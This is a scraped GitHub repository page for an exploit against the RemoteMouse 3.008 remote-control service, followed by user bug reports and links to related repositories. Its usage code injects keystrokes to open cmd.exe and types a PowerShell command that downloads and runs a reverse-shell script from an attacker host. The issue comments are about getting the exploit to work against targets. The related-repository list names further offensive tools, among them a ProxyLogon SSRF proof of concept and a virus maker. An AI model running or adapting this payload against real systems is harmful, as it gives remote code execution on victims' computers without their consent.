This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

Related tags

Security related resourcesremote-controlexploitpentestremotemouse
Overview

RemoteMouse-3.008-Exploit

The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.

Video Proof of Concept

poc.mp4

Usage

remotemouse = RemoteMouse(host=options.target_ip, verbose=options.verbose)

# Press Win + R
remotemouse._send_command(Keymap.KEY_WIN)

# Type cmd.exe
remotemouse.keyboard.press(Keymap.KEY_BACKSPACE)
remotemouse.keyboard.type("cmd.exe")
remotemouse.keyboard.press(Keymap.KEY_RETURN)

# Wait for cmd.exe to start
time.sleep(0.5)

# Payload
cmd = "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""

# Send payload char by char
remotemouse.keyboard.type(cmd)

# Press enter to execute payload
remotemouse.keyboard.press(Keymap.KEY_WIN)

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

References

Comments
  • unsupported operand type(s) Python 3.10.4

    unsupported operand type(s) Python 3.10.4

    Hey,

    I'm getting issues when running the exploit on Python 3.10.4. $ python3 Remote.py -v -t $IP

    [cmd] Keymap.KEY_WIN
ERROR: a bytes-like object is required, not 'Keymap'
[cmd] key  3BASd
Traceback (most recent call last):
  File "/tmp/Remote.py", line 275, in <module>
    remotemouse.keyboard.type("cmd.exe")
  File "/tmp/Remote.py", line 171, in type
    self.press(character)
  File "/tmp/Remote.py", line 178, in press
    self.parent_remotemouse._send_command(self.charset[key] + "d")
TypeError: unsupported operand type(s) for +: 'Keymap' and 'str'
    opened by Darktortue 1
  • the script is not running as expected

    the script is not running as expected

    ISSUE

    Using the provided RemoteMouse-3.008-Exploit.py AS-IS, will not work.

    EXPECTED BEHAVIOR

    • I'm expecting the start menu to open and the cmd.exe to be written...

    ACTUAL BEHAVIOR

    • Nothing opens or written

    TROUBLESHOOTING

    • I've changed remotemouse._send_command(Keymap.KEY_WIN.value) to remotemouse.keyboard.press(Keymap.KEY_WIN)
      • now the start menu opens
    • I wanted to just test the typing functionality with remotemouse.keyboard.type("cmd.exe")
      • I opened a notepad with the cursor active on it, nothing happened.

    ENVIRONMENT

    • source: Kali Linux
      • Python 3.9.12
    • target: Windows 10 (version 1709)
    opened by bigoper 0
  • not sure why it's trying to enum a keymap

    not sure why it's trying to enum a keymap 

    class Keymap(Enum):

    File "./yeaboi.py", line 118, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.6/enum.py", line 92, in setitem raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

    opened by NAP3XD 0
  • Having issue when running the script

    Having issue when running the script

    Hi P0dalirius,

    This is an awsome exploit but i'm having some issues running it from my VM, are you able to advise as to why? I'm running ./remote -v -t $IP Traceback (most recent call last): File "/home**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 25, in <module> class Keymap(Enum): File "/home/**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 115, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.9/enum.py", line 133, in __setitem__ raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

    opened by reshfi 0
  • Running exploit in slower networks leads to

    Running exploit in slower networks leads to "not-in-order" output

    Thanks for your well written exploit code, but I have one issue with the execution of it in worse network conditions than a local network. A good addition would be to add a configurable sleep between the keystrokes to make this issue less common.

    Otherwise it would look like this: image

    opened by 1989gironimo 0
Releases(1.0)
Owner
Podalirius
Hacker of everything
Podalirius
GitHub Repository https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/
PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github

CVE-2021-26855 PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github Why does github remove this exploit because

The Hacker's Choice 58 Nov 15, 2022
cve-2021-21985 exploit

cve-2021-21985 exploit 0x01 漏洞点 分析可见: https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis 0x02 exploit 对beans对象进行重新构

xnianq 105 Nov 22, 2022
The self-hostable proxy tunnel

TTUN Server The self-hostable proxy tunnel. Running Running: docker run -e TUNNEL_DOMAIN=Your tunnel domain -e SECURE=True if using SSL ghcr.io/to

Tom van der Lee 2 Jan 11, 2022
Tool to scan for RouterOS (Mikrotik) forensic artifacts and vulnerabilities.

RouterOS Scanner Forensics tool for Mikrotik devices. Search for suspicious properties and weak security points that need to be fixed on the router. T

Microsoft 823 Dec 21, 2022
Tool ini berfungsi untuk membuat virus secara instan

vbug (ID) Tool ini berfungsi untuk membuat virus secara instan. Dengan begitu pengguna vbug maker dapat menggunakannya dengan mudah dan cepat. Di dala

OneTXz 3 Jun 05, 2022
A python package with tools to read and postprocess the output of the channel DNS-solver (davecats/channel), as well as its associated postprocessing tools.

Python tools for davecats/channel A python package with tools to read and postprocess the output of the channel dns solver, as well as its associated

Andrea Andreolli 1 Dec 13, 2021
Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

js-on 17 Dec 11, 2022
Um script simples de Port Scan + DNS by Hostname

🖥 PortScan-DNS Esta é uma ferramenta simples de Port Scan + DNS by Hostname... 💻 | DNS Resolver / by Hostname: HOST IP EXTERNO IP INTERNO 💻 | Port

AlbâniaSecurity-RT 7 Dec 08, 2022
A BurpSuite extension to parse 5GC NF OpenAPI 3.0 files to assess 5G core networks

5GC_API_parse Description 5GC API parse is a BurpSuite extension allowing to assess 5G core network functions, by parsing the OpenAPI 3.0 not supporte

PentHertz 57 Dec 16, 2022
This Repository is an up-to-date version of Harvard nlp's Legacy code and a Refactoring of the jupyter notebook version as a shell script version.

This Repository is an up-to-date version of Harvard nlp's Legacy code and a Refactoring of the jupyter notebook version as a shell script version.

신재욱 17 Sep 25, 2022
BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.

Follow us on Twitter! BoobSnail BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro gen

STM Cyber 232 Nov 21, 2022
A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

MotionEye/MotionEyeOS Authenticated RCE A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator crede

Matt 1 Apr 18, 2022
Fast and easy way to rollout on multiple GitLab project file a particular content.

Volatile Fast and easy way to rollout on multiple GitLab project file a particular content. Why ? After looking for a tool to simply enforce a develop

Lujeni 4 Jan 17, 2022
Make files with as many random bytes as you want

Lots o' Bytes 🔣 Make files with as many random bytes as you want! Use case Can be used to package malware that is normally small by making the downlo

Addi 1 Jan 13, 2022
A kAFL based hypervisor fuzzer which fully supports nested VMs

hAFL2 hAFL2 is a kAFL-based hypervisor fuzzer. It is the first open-source fuzzer which is able to target hypervisors natively (including Hyper-V), as

SafeBreach Labs 115 Dec 07, 2022
Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服

86 Dec 09, 2022
Open-source jailbreaking tool for many iOS devices

Open-source jailbreaking tool for many iOS devices *Read disclaimer before using this software. checkm8 permanent unpatchable bootrom exploit for hund

6.7k Jan 05, 2023
A knockoff social-engineer toolkit

The Python SE Dopp Kit is a social engineering toolkit with many purposes. It contains 5 different modules designed to be of assistance in different s

48 Nov 26, 2022
Downloads SEP, Baseband and BuildManifest automatically for signed iOS version's for connected iDevice

FutureHelper Supports macOS and Windows Downloads SEP, Baseband and BuildManifest automatically for signed iOS version's (including beta firmwares) fo

Kasim Hussain 7 Jan 05, 2023
Python program that generates secure passwords.

Python program that generates secure passwords. The user has the option to select the length of the password, amount of passwords,

4 Dec 07, 2021